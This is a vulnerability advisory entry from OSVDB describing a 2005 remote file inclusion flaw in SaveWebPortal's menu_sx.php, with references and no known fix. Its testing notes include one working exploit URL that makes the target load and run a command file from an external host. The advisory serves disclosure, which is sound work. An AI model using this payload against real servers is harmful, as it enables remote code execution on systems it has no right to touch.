SaveWebPortal menu_sx.php CONTENTS_Dir Variable Remote File Inclusion

2005-08-21T15:31:56
ID OSVDB:18931
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-08-21T15:31:56

Description

Vulnerability Description

SaveWebPortal contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'menu_sx.php' not properly sanitizing user input supplied to the 'CONTENTS_Dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

SaveWebPortal contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'menu_sx.php' not properly sanitizing user input supplied to the 'CONTENTS_Dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00

References:

Vendor URL: http://www.circeos.it/ Security Tracker: 1014748 Secunia Advisory ID:16522 Related OSVDB ID: 18932 Related OSVDB ID: 18934 Related OSVDB ID: 18930 Related OSVDB ID: 18935 Related OSVDB ID: 18936 Related OSVDB ID: 18927 Related OSVDB ID: 18928 Related OSVDB ID: 18929 Related OSVDB ID: 18933 Other Advisory URL: http://rgod.altervista.org/save_yourself_from_savewebportal34.html CVE-2005-2687